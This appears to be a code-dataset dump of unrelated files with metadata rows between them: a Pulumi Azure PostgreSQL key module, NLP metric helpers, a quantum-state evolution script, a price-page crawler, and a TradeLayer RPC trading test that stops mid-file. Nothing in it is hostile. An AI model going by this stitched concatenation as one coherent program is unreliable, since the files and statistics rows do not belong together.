version="11",
storage_mb=51200,
ssl_enforcement_enabled=True,
identity=azure.postgresql.ServerIdentityArgs(
type="SystemAssigned",
))
server = azure.keyvault.AccessPolicy("server",
key_vault_id=example_key_vault.id,
tenant_id=current.tenant_id,
object_id=example_server.identity.principal_id,
key_permissions=[
"get",
"unwrapkey",
"wrapkey",
],
secret_permissions=["get"])
client = azure.keyvault.AccessPolicy("client",
key_vault_id=example_key_vault.id,
tenant_id=current.tenant_id,
object_id=current.object_id,
key_permissions=[
"get",
"create",
"delete",
"list",
"restore",
"recover",
"unwrapkey",
"wrapkey",
"purge",
"encrypt",
"decrypt",
"sign",
"verify",
],
secret_permissions=["get"])
example_key = azure.keyvault.Key("exampleKey",
key_vault_id=example_key_vault.id,
key_type="RSA",
key_size=2048,
key_opts=[
"decrypt",
"encrypt",
"sign",
"unwrapKey",
"verify",
"wrapKey",
],
opts=pulumi.ResourceOptions(depends_on=[
client,
server,
]))
example_server_key = azure.postgresql.ServerKey("exampleServerKey",
server_id=example_server.id,
key_vault_key_id=example_key.id)
```
## Import
A PostgreSQL Server Key can be imported using the `resource id` of the PostgreSQL Server Key, e.g.
```sh
$ pulumi import azure:postgresql/serverKey:ServerKey example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.DBforPostgreSQL/servers/server1/keys/keyvaultname_key-name_keyversion
```
:param str resource_name: The name of the resource.
:param ServerKeyArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ServerKeyArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
key_vault_key_id: Optional[pulumi.Input[str]] = None,
server_id: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ServerKeyArgs.__new__(ServerKeyArgs)
if key_vault_key_id is None and not opts.urn:
raise TypeError("Missing required property 'key_vault_key_id'")
__props__.__dict__["key_vault_key_id"] = key_vault_key_id
if server_id is None and not opts.urn:
raise TypeError("Missing required property 'server_id'")
__props__.__dict__["server_id"] = server_id
super(ServerKey, __self__).__init__(
'azure:postgresql/serverKey:ServerKey',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
key_vault_key_id: Optional[pulumi.Input[str]] = None,
server_id: Optional[pulumi.Input[str]] = None) -> 'ServerKey':
"""
Get an existing ServerKey resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] key_vault_key_id: The URL to a Key Vault Key.
:param pulumi.Input[str] server_id: The ID of the PostgreSQL Server. Changing this forces a new resource to be created.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ServerKeyState.__new__(_ServerKeyState)
__props__.__dict__["key_vault_key_id"] = key_vault_key_id
__props__.__dict__["server_id"] = server_id
return ServerKey(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="keyVaultKeyId")
def key_vault_key_id(self) -> pulumi.Output[str]:
"""
The URL to a Key Vault Key.
"""
return pulumi.get(self, "key_vault_key_id")
@property
@pulumi.getter(name="serverId")
def server_id(self) -> pulumi.Output[str]:
"""
The ID of the PostgreSQL Server. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "server_id")
| 38.915531 | 233 | 0.600616 | 1,570 | 14,282 | 5.164968 | 0.142038 | 0.054261 | 0.055617 | 0.054507 | 0.812184 | 0.79233 | 0.78604 | 0.761376 | 0.755087 | 0.748551 | 0 | 0.009971 | 0.304789 | 14,282 | 366 | 234 | 39.021858 | 0.806728 | 0.502101 | 0 | 0.495727 | 1 | 0 | 0.108728 | 0.006601 | 0 | 0 | 0 | 0 | 0 | 1 | 0.145299 | false | 0.008547 | 0.042735 | 0 | 0.273504 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6fef3b686ca410f8ffd2132f27de000372819c26 | 1,287 | py | Python | src/model/metric.py | nobu-g/cohesion-analysis | bf2e22c1aff51f96fd2aaef6359839646548c3be | [
"MIT"
] | 12 | 2020-12-25T11:13:17.000Z | 2021-12-28T05:19:46.000Z | src/model/metric.py | nobu-g/cohesion-analysis | bf2e22c1aff51f96fd2aaef6359839646548c3be | [
"MIT"
] | 1 | 2020-12-25T09:26:26.000Z | 2020-12-25T09:26:34.000Z | src/model/metric.py | nobu-g/cohesion-analysis | bf2e22c1aff51f96fd2aaef6359839646548c3be | [
"MIT"
] | 1 | 2022-02-25T13:22:47.000Z | 2022-02-25T13:22:47.000Z | def case_analysis_f1_ga(result: dict):
return result['ガ']['dep'].f1
def case_analysis_f1_wo(result: dict):
return result['ヲ']['dep'].f1
def case_analysis_f1_ni(result: dict):
return result['ニ']['dep'].f1
def case_analysis_f1_ga2(result: dict):
return result['ガ2']['dep'].f1
def case_analysis_f1(result: dict):
return result['all_case']['dep'].f1
def zero_anaphora_f1_ga(result: dict):
return result['ガ']['zero'].f1
def zero_anaphora_f1_wo(result: dict):
return result['ヲ']['zero'].f1
def zero_anaphora_f1_ni(result: dict):
return result['ニ']['zero'].f1
def zero_anaphora_f1_ga2(result: dict):
return result['ガ2']['zero'].f1
def zero_anaphora_f1(result: dict):
return result['all_case']['zero'].f1
def zero_anaphora_f1_inter(result: dict):
return result['all_case']['zero_inter'].f1
def zero_anaphora_f1_intra(result: dict):
return result['all_case']['zero_intra'].f1
def zero_anaphora_f1_exophora(result: dict):
return result['all_case']['zero_exophora'].f1
def pas_analysis_f1(result: dict):
return result['all_case']['dep_zero'].f1
def coreference_f1(result: dict):
return result['all_case']['coreference'].f1
def bridging_anaphora_f1(result: dict):
return result['all_case']['bridging'].f1
| 20.428571 | 49 | 0.703186 | 198 | 1,287 | 4.29798 | 0.126263 | 0.188014 | 0.300823 | 0.413631 | 0.867215 | 0.802585 | 0.606345 | 0.190364 | 0.098707 | 0 | 0 | 0.032345 | 0.135198 | 1,287 | 62 | 50 | 20.758065 | 0.732255 | 0 | 0 | 0 | 0 | 0 | 0.131313 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0.5 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
6ff955ea7b973ffeed67819eaa13272800cb4a52 | 157 | py | Python | test/programytest/parser/pattern/matching/test_wildcard_branches.py | NeolithEra/program-y | 8c2396611f30c8095e98ff02988223a641c1a3be | [
"MIT"
] | 345 | 2016-11-23T22:37:04.000Z | 2022-03-30T20:44:44.000Z | test/programytest/parser/pattern/matching/test_wildcard_branches.py | MikeyBeez/program-y | 00d7a0c7d50062f18f0ab6f4a041068e119ef7f0 | [
"MIT"
] | 275 | 2016-12-07T10:30:28.000Z | 2022-02-08T21:28:33.000Z | test/programytest/parser/pattern/matching/test_wildcard_branches.py | VProgramMist/modified-program-y | f32efcafafd773683b3fe30054d5485fe9002b7d | [
"MIT"
] | 159 | 2016-11-28T18:59:30.000Z | 2022-03-20T18:02:44.000Z | from programytest.parser.pattern.matching.base import PatternMatcherBaseClass
class PatternMatcherWildcardBranchesTests(PatternMatcherBaseClass):
pass
| 26.166667 | 77 | 0.872611 | 12 | 157 | 11.416667 | 0.916667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.082803 | 157 | 5 | 78 | 31.4 | 0.951389 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
965fc8f5db1a76163eedd0046de36d77430c704c | 1,316 | py | Python | Scripts/evolve_script.py | zeldredge/py-nqs | 1bf2545678f71a61ff309e61063930766e5cc63d | [
"Unlicense",
"MIT"
] | 11 | 2019-08-03T04:44:24.000Z | 2021-11-04T18:25:22.000Z | Scripts/evolve_script.py | zeldredge/py-nqs | 1bf2545678f71a61ff309e61063930766e5cc63d | [
"Unlicense",
"MIT"
] | null | null | null | Scripts/evolve_script.py | zeldredge/py-nqs | 1bf2545678f71a61ff309e61063930766e5cc63d | [
"Unlicense",
"MIT"
] | 3 | 2019-07-24T04:34:27.000Z | 2021-11-05T19:01:06.000Z | import numpy as np
import trainer
import ising1d
import nqs
import sampler
import evolver
import observables
nsteps = 400
### INITIALIZATION
wf = nqs.NqsLocal(10, 2, 1) # Set up a translation-invariant neural network
wf.load_parameters('../Outputs/10_Ising05_2loc_200.npz') # Load this pre-trained ANNQS
## TIME EVOLVE
h = ising1d.Ising1d(10, 1.0)
evo = evolver.Evolver(h)
wf = evo.evolve(wf, .01, nsteps + 1, symmetry="local", file='../Outputs/10SpinEvolve/evolution_2loc_', print_freq=25, out_freq=1, batch_size=1000)
### INITIALIZATION
wf = nqs.NqsLocal(10, 1, 1) # Set up a translation-invariant neural network
wf.load_parameters('../Outputs/10_Ising05_1loc_200.npz') # Load this pre-trained ANNQS
## TIME EVOLVE
h = ising1d.Ising1d(10, 1.0)
evo = evolver.Evolver(h)
wf = evo.evolve(wf, .01, nsteps + 1, symmetry="local", file='../Outputs/10SpinEvolve/evolution_1loc_', print_freq=25, out_freq=1, batch_size=1000)
### INITIALIZATION
wf = nqs.NqsTI(10, 1) # Set up a translation-invariant neural network
wf.load_parameters('../Outputs/10_Ising05_ti_200.npz') # Load this pre-trained ANNQS
## TIME EVOLVE
h = ising1d.Ising1d(10, 1.0)
evo = evolver.Evolver(h)
wf = evo.evolve(wf, .01, nsteps + 1, symmetry="ti", file='../Outputs/10SpinEvolve/evolution_ti_', print_freq=25, out_freq=1, batch_size=1000)
| 35.567568 | 146 | 0.739362 | 206 | 1,316 | 4.592233 | 0.276699 | 0.015856 | 0.060254 | 0.022199 | 0.825581 | 0.784355 | 0.784355 | 0.784355 | 0.784355 | 0.750529 | 0 | 0.081104 | 0.119301 | 1,316 | 36 | 147 | 36.555556 | 0.735116 | 0.229483 | 0 | 0.26087 | 0 | 0 | 0.228831 | 0.216734 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.304348 | 0 | 0.304348 | 0.130435 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
96bb9c5fd24559b0f6e8808492f5030345d02869 | 8,337 | py | Python | crawler/module/cloudkilat.py | riszkymf/pricefinder | 0f2625a90d176ed3e2772a1ec65d60c464290f8f | [
"MIT"
] | null | null | null | crawler/module/cloudkilat.py | riszkymf/pricefinder | 0f2625a90d176ed3e2772a1ec65d60c464290f8f | [
"MIT"
] | 3 | 2021-03-31T19:04:46.000Z | 2022-03-02T14:57:49.000Z | crawler/module/cloudkilat.py | riszkymf/pricefinder | 0f2625a90d176ed3e2772a1ec65d60c464290f8f | [
"MIT"
] | null | null | null | from bs4 import BeautifulSoup
from crawler.libs.util import get_page
base_url = 'http://www.cloudkilat.com'
company_name = 'cloudkilat'
class VM(object):
endpoint = '/layanan/kilat-vm-2.0#harga'
product_name = "VM 2.0"
def __init__(self, **kwargs):
self.company_name = company_name
for key, value in kwargs.items():
try:
setattr(self, key, value)
except:
print("Can not set value")
pass
def run(self):
self.url = base_url+self.endpoint
result = get_page(self.url)
self.status_code = result.status_code
data = self.soup_parser(result)
self.data = data
def soup_parser(self, result):
page = result.text
res = BeautifulSoup(page, "html.parser")
items = res.find_all("li", class_="item-none")
result_data = []
for item in items:
d = {}
if 'list-header' not in item['class']:
d['Type'] = item.h4.text
d['Duration'] = item.find('div', class_='duration').get_text(strip=True).replace(" ","").replace("\n"," ")
specs = item.find('div', class_='spesifications')
specs_details = specs.find_all('div', class_='value')
for key, value in zip(header, specs_details):
d[key] = value.get_text(strip=True)
d['price'] = item.h5.text
d['notes'] = item.find('div', class_='notes').text
result_data.append(d)
else:
header = [i.get_text(strip=True).replace(" ","_") for i in item.find_all('div',class_='item')]
return result_data
class ObjectStorage(object):
endpoint = "/layanan/kilat-storage#harga"
product_name = "Object Storage"
def __init__(self, **kwargs):
self.company_name = company_name
for key, value in kwargs.items():
try:
setattr(self, key, value)
except:
print("Can not set value")
pass
def run(self):
self.url = base_url + self.endpoint
result = get_page(self.url)
self.status_code = result.status_code
data = self.soup_parser(result)
self.data = data
def soup_parser(self, result):
page = result.text
res = BeautifulSoup(page, "html.parser")
price_area = res.find('ul', class_="price-list")
items = price_area.find_all('li', class_='item-none')
result_data = list()
for item in items:
d = {}
d['Type'] = item.find('h4', class_='type').text
d['Duration'] = item.find('div', class_='duration').get_text(strip=True).replace(" ","").replace("\n"," ")
specs = zip(item.select("div.columns.item"),item.select("div.columns.value"))
for key, value in specs:
key = key.get_text(strip=True)
value = value.get_text(strip=True)
d[key] = value
d['Price'] = item.find('h5', class_='price').text
result_data.append(d)
return result_data
class Plesk(object):
endpoint = "/layanan/kilat-plesk#harga"
product_name = "Plesk"
def __init__(self, **kwargs):
self.company_name = company_name
for key,value in kwargs.items():
try:
setattr(self, key, value)
except:
print("Can not set value")
pass
def run(self):
self.url = base_url + self.endpoint
result = get_page(self.url)
self.status_code = result.status_code
data = self.soup_parser(result)
self.data = data
def soup_parser(self, result):
page = result.text
res = BeautifulSoup(page, "html.parser")
price_area = res.find('ul', class_="price-list")
items = price_area.find_all('li', class_='item-none')
result_data = list()
for item in items:
d = {}
d['duration'] = item.find('div',class_='duration').get_text(strip=True).replace(" ","").replace("\n"," ")
specs = zip(item.select("div.columns.item"),item.select("div.columns.value"))
for key, value in specs:
key = key.get_text(strip=True)
value = value.get_text(strip=True)
d[key] = value
d['price'] = item.find('h5', class_='price').text
result_data.append(d)
return result_data
class Hosting(object):
endpoint = '/layanan/kilat-hosting'
product_name = "hosting"
def __init__(self, **kwargs):
self.company_name = company_name
for key, value in kwargs.items():
try:
setattr(self, key, value)
except:
print("Can not set value")
pass
def run(self):
self.url = base_url + self.endpoint
result = get_page(self.url)
self.status_code = result.status_code
data = self.soup_parser(result)
self.data = data
def soup_parser(self, result):
page = result.text
res = BeautifulSoup(page, "html.parser")
result_data = list()
d = {}
price_area = res.find('div', class_='pricing')
d['duration'] = price_area.find('div', class_='duration').get_text(strip=True).replace(" ", "").replace("\n"," ")
d['price'] = price_area.find('h1', class_='price').text
features = res.find('div', class_='summary')
features = features.find('ul')
features_str = []
items = features.find_all('li')
for item in items:
txt = item.text.replace('\n',' ').rstrip(' ').lstrip(' ')
features_str.append(txt)
d['features'] = features_str
result_data.append(d)
return result_data
class KilatIron(object):
endpoint = '/layanan/kilat-iron'
product_name = "Iron"
def __init__(self, **kwargs):
self.company_name = company_name
for key, value in kwargs.items():
try:
setattr(self, key, value)
except:
print("Can not set value")
pass
def run(self):
self.url = base_url + self.endpoint
result = get_page(self.url)
self.status_code = result.status_code
data = self.soup_parser(result)
self.data = data
def soup_parser(self, result):
page = result.text
res = BeautifulSoup(page, "html.parser")
result_data = list()
d = {}
price_area = res.find('div', class_='pricing')
d['duration'] = price_area.find('div', class_='duration').get_text(strip=True).replace(" ", "").replace("\n"," ")
d['price'] = price_area.find('h1', class_='price').text
features = res.find('div', class_='summary')
features = features.find('ul')
features_str = []
items = features.find_all('li')
for item in items:
txt = item.text.replace('\n', ' ').rstrip(' ').lstrip(' ')
features_str.append(txt)
d['features'] = features_str
result_data.append(d)
return result_data
class Domain(object):
endpoint = '/layanan/kilat-domain'
product_name = "domain"
def __init__(self, **kwargs):
self.company_name = company_name
for key, value in kwargs.items():
try:
setattr(self, key, value)
except:
print("Can not set value")
pass
def run(self):
self.url = base_url + self.endpoint
result = get_page(self.url)
self.status_code = result.status_code
data = self.soup_parser(result)
self.data = data
def soup_parser(self, result):
result_data = list()
page = result.text
res = BeautifulSoup(page, "html.parser")
table = res.find('table', class_='price-table').find('tbody')
keys = ["domain", "baru", "perpanjang", "harga"]
rows = table.find_all('tr')
for row in rows:
d = {}
cells = row.find_all('td')
for key, value in zip(keys, cells):
d[key] = value.text
result_data.append(d)
return result_data
| 33.753036 | 122 | 0.548639 | 989 | 8,337 | 4.461072 | 0.112235 | 0.036265 | 0.029918 | 0.039891 | 0.80349 | 0.781732 | 0.776745 | 0.776745 | 0.751133 | 0.751133 | 0 | 0.002103 | 0.315701 | 8,337 | 246 | 123 | 33.890244 | 0.771253 | 0 | 0 | 0.78673 | 0 | 0 | 0.105554 | 0.014873 | 0 | 0 | 0 | 0 | 0 | 1 | 0.085308 | false | 0.028436 | 0.009479 | 0 | 0.208531 | 0.028436 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7366cbe060e50f6e929307bc28c368f4fe9fee01 | 43,243 | py | Python | test/functional/tl_natives.py | ogreckoner/BlockPo-to-Tradelayer | e14e8783ba804569946414f2e1706a1f965f6129 | [
"MIT"
] | null | null | null | test/functional/tl_natives.py | ogreckoner/BlockPo-to-Tradelayer | e14e8783ba804569946414f2e1706a1f965f6129 | [
"MIT"
] | 5 | 2021-06-21T21:21:53.000Z | 2021-06-22T20:10:16.000Z | test/functional/tl_natives.py | TradeLayerDesk/BlockPo-to-Tradelayer | e14e8783ba804569946414f2e1706a1f965f6129 | [
"MIT"
] | 1 | 2021-06-21T21:14:45.000Z | 2021-06-21T21:14:45.000Z | #!/usr/bin/env python3
# Copyright (c) 2015-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test ContractDEx functions (natives)."""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
import os
import json
import http.client
import urllib.parse
class NativesBasicsTest (BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.setup_clean_chain = True
self.extra_args = [["-txindex=1"]]
def setup_chain(self):
super().setup_chain()
#Append rpcauth to bitcoin.conf before initialization
rpcauth = "rpcauth=rt:93648e835a54c573682c2eb19f882535$7681e9c5b74bdd85e78166031d2058e1069b3ed7ed967c93fc63abba06f31144"
rpcuser = "rpcuser=rpcuser💻"
rpcpassword = "rpcpassword=rpcpassword🔑"
with open(os.path.join(self.options.tmpdir+"/node0", "litecoin.conf"), 'a', encoding='utf8') as f:
f.write(rpcauth+"\n")
def run_test(self):
self.log.info("Preparing the workspace...")
# mining 200 blocks
self.nodes[0].generate(200)
################################################################################
# Checking RPC tl_sendtrade (in the first 200 blocks of the chain) #
################################################################################
url = urllib.parse.urlparse(self.nodes[0].url)
#Old authpair
authpair = url.username + ':' + url.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
addresses = []
accounts = ["john", "doe", "another"]
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
self.log.info("Creating sender address")
addresses = tradelayer_createAddresses(accounts, conn, headers)
self.log.info("Funding addresses with LTC")
amount = 1.1
tradelayer_fundingAddresses(addresses, amount, conn, headers)
self.log.info("Checking the LTC balance in every account")
tradelayer_checkingBalance(accounts, amount, conn, headers)
self.log.info("Creating new tokens (lihki)")
array = [0]
params = str([addresses[0],2,0,"lihki","","","100000",array]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_sendissuancefixed",params)
assert_equal(out['error'], None)
# self.log.info(out)
self.nodes[0].generate(1)
self.log.info("Self Attestation for addresses")
tradelayer_selfAttestation(addresses,conn, headers)
self.log.info("Checking attestations")
out = tradelayer_HTTP(conn, headers, False, "tl_list_attestation")
# self.log.info(out)
result = []
registers = out['result']
for addr in addresses:
for i in registers:
if i['att sender'] == addr and i['att receiver'] == addr and i['kyc_id'] == 0:
result.append(True)
assert_equal(result, [True, True, True])
self.log.info("Checking the property: lihki")
params = str([4])
out = tradelayer_HTTP(conn, headers, True, "tl_getproperty",params)
assert_equal(out['error'], None)
# self.log.info(out)
assert_equal(out['result']['propertyid'],4)
assert_equal(out['result']['name'],'lihki')
assert_equal(out['result']['data'],'')
assert_equal(out['result']['url'],'')
assert_equal(out['result']['divisible'],True)
assert_equal(out['result']['totaltokens'],'100000.00000000')
self.log.info("Checking tokens balance in lihki's owner ")
params = str([addresses[0], 4]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getbalance",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['balance'],'100000.00000000')
assert_equal(out['result']['reserve'],'0.00000000')
self.log.info("Sending 50000 tokens to second address")
params = str([addresses[0], addresses[1], 4, "50000"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_send",params)
assert_equal(out['error'], None)
# self.log.info(out)
self.nodes[0].generate(1)
self.log.info("Checking tokens in receiver address")
params = str([addresses[1], 4]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getbalance",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['balance'],'50000.00000000')
assert_equal(out['result']['reserve'],'0.00000000')
self.log.info("Creating native Contract")
array = [0]
params = str([addresses[0], 1, 4, "ALL/Lhk", 1000, "1", 4, "0.1", 0, array]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_createcontract",params)
# self.log.info(out)
assert_equal(out['error'], None)
self.nodes[0].generate(1)
self.log.info("Checking the native contract")
params = str([5])
out = tradelayer_HTTP(conn, headers, True, "tl_getproperty",params)
assert_equal(out['error'], None)
# self.log.info(out)
assert_equal(out['result']['propertyid'],5)
assert_equal(out['result']['name'],'ALL/Lhk')
assert_equal(out['result']['issuer'], addresses[0])
assert_equal(out['result']['notional size'], '1')
assert_equal(out['result']['collateral currency'], '4')
assert_equal(out['result']['margin requirement'], '0.1')
assert_equal(out['result']['blocks until expiration'], '1000')
assert_equal(out['result']['inverse quoted'], '0')
#NOTE: we need to test this for all leverages
self.log.info("Buying contracts")
params = str([addresses[1], "ALL/Lhk", "1000", "780.5", 1, "1"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, False, "tl_tradecontract",params)
# self.log.info(out)
assert_equal(out['error'], None)
hash = str(out['result']).replace("'","")
# self.log.info(hash)
self.nodes[0].generate(1)
self.log.info("Checking colateral balance now in sender address")
params = str([addresses[1], 4]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getbalance",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['balance'],'49899.99000000')
assert_equal(out['result']['reserve'],'100.01000000')
self.log.info("Checking orderbook")
params = str(["ALL/Lhk", 1]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getcontract_orderbook",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result'][0]['address'], addresses[1])
assert_equal(out['result'][0]['contractid'], 5)
assert_equal(out['result'][0]['amountforsale'], 1000)
assert_equal(out['result'][0]['tradingaction'], 1)
assert_equal(out['result'][0]['effectiveprice'], '780.50000000')
assert_equal(out['result'][0]['block'], 206)
self.log.info("Canceling Contract order")
address = '"'+addresses[1]+'"'
params = str([addresses[1], hash]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_sendcancel_contract_order",params)
# self.log.info(out)
assert_equal(out['error'], None)
self.nodes[0].generate(1)
self.log.info("Checking orderbook")
params = str(["ALL/Lhk", 1]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getcontract_orderbook",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result'], [])
#NOTE: we need to test this for all leverages
self.log.info("Checking restored colateral in sender address")
params = str([addresses[1], 4]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getbalance",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['balance'],'50000.00000000')
assert_equal(out['result']['reserve'],'0.00000000')
self.log.info("Buying contracts again")
params = str([addresses[1], "ALL/Lhk", "1000", "980.5", 1, "1"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_tradecontract",params)
# self.log.info(out)
assert_equal(out['error'], None)
hash = str(out['result']).replace("'","")
self.nodes[0].generate(1)
self.log.info("Checking orderbook")
params = str(["ALL/Lhk", 1]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getcontract_orderbook",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result'][0]['address'], addresses[1])
assert_equal(out['result'][0]['contractid'], 5)
assert_equal(out['result'][0]['amountforsale'], 1000)
assert_equal(out['result'][0]['tradingaction'], 1)
assert_equal(out['result'][0]['effectiveprice'], '980.50000000')
# assert_equal(out['result'][0]['block'], 206)
self.log.info("Another address selling contracts")
params = str([addresses[0], "ALL/Lhk", "1000", "980.5", 2, "1"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_tradecontract",params)
# self.log.info(out)
assert_equal(out['error'], None)
self.nodes[0].generate(1)
# we need to se here the margin for addresses[0]
params = str([addresses[0], 4]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getreserve",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['reserve'],'100.00000000')
self.log.info("Checking orderbook")
params = str(["ALL/Lhk", 1]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getcontract_orderbook",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result'],[])
self.log.info("Checking position in first address")
params = str([addresses[1], "ALL/Lhk"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getposition",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['position'], 1000)
self.log.info("Checking position in second address")
params = str([addresses[0], "ALL/Lhk"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getposition",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['position'], -1000)
self.log.info("Checking the open interest")
params = str(["ALL/Lhk"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getopen_interest",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['totalLives'], 1000)
self.log.info("Checking when the price does not match")
self.log.info("Buying contracts at price 100.3")
params = str([addresses[1], "ALL/Lhk", "1000", "100.3", 1, "1"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_tradecontract",params)
# self.log.info(out)
assert_equal(out['error'], None)
hash = str(out['result']).replace("'","")
self.nodes[0].generate(1)
self.log.info("Checking orderbook (buy side)")
params = str(["ALL/Lhk", 1]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getcontract_orderbook",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result'][0]['address'], addresses[1])
assert_equal(out['result'][0]['contractid'], 5)
assert_equal(out['result'][0]['amountforsale'], 1000)
assert_equal(out['result'][0]['tradingaction'], 1)
assert_equal(out['result'][0]['effectiveprice'], '100.30000000')
# assert_equal(out['result'][0]['block'], 206)
self.log.info("Another address selling contracts at 900.1")
params = str([addresses[0], "ALL/Lhk", "1000", "900.1", 2, "1"]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_tradecontract",params)
# self.log.info(out)
assert_equal(out['error'], None)
self.nodes[0].generate(1)
# we need to se here the margin for addresses[0]
params = str([addresses[0], 4]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getreserve",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result']['reserve'],'200.01000000')
self.log.info("Checking orderbook (sell side)")
params = str(["ALL/Lhk", 2]).replace("'",'"')
out = tradelayer_HTTP(conn, headers, True, "tl_getcontract_orderbook",params)
# self.log.info(out)
assert_equal(out['error'], None)
assert_equal(out['result'][0]['address'], addresses[0])
assert_equal(out['result'][0]['contractid'], 5)
assert_equal(out['result'][0]['amountforsale'], 1000)
assert_equal(out['result'][0]['tradingaction'], 2)
assert_equal(out['result'][0]['effectiveprice'], '900.10000000')
# assert_equal(out['result'][0]['block'], 206)
self.log.info("Cancel orders using tl_cancelallcontractsbyaddress")
